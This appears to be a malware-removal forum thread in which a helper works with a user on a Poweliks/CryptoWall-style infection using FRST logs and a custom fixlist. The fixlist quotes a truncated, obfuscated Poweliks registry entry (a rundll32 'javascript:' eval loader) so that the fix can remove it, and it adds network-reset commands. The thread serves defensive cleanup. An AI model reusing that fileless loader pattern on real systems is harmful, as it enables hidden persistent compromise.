My computer was acting strangely over the weekend, with Avast alerting me to something that was trying to open a malicious web site every few minutes. I also found some processes running (dllhost.exe*32 - COM Surrogate) that I didn’t recognize, and they regenerated each time I killed them. I’ve tried Boottime scans with Avast and Malwarebytes, but the problem is still with me.
I’ve downloaded and run the programs you usually advise and attached the log files below.
Looking forward to your help.
Jim
If CryptoWall is on your computer, your files should be encrypted. Is that so? You should also have a Police Page opening on bootup OR every time you open a webpage… Can you confirm that as well?
Here’s the log file from the most recent run of FRST64, and thanks for your help.
Oh, one last thing. I really don’t care at all about the encrypted files that I’m going to lose. There really isn’t anything of value on this computer. It’s used solely for online gaming. No important docs, images, movies, no attached storage, and no links to cloud storage. My goal is to ensure that they can’t get back into the computer again, not to recover the files.
My apologies. I’ve been very tied up with a project at work and practically living there. No time to put into this computer till today.
The problem is still with me. Avast still reports that it’s repeatedly blocking malicious web sites. Is there a next step that I can take?
Could you manually delete the following folder, please, as my tools cannot handle the coding:
C:\Users\Kathy-\AppData\Roaming\麽鎒駓覜
Also, could you post the additions txt that was generated?
CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.
Open notepad and copy/paste the text in the quotebox below into it:
HKU\S-1-5-21-1699977870-1126029260-2032547726-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - No File
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state ON
CMD: ipconfig /flushdns
CMD: netsh winsock reset catalog
CMD: netsh int ip reset c:\resetlog.txt
CMD: ipconfig /release
CMD: ipconfig /renew
Save this as fixlist.txt, in the same location as FRST.exe.
Run FRST and press Fix.
On completion a log will be generated; please post that.
WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java.
See this article
I would recommend that you completely uninstall Java unless you need it to run important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to disable Java in your web browser and How to unplug Java from the browser)
Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:
CryptoPrevent: install this programme to lock down and prevent crypto ransomware.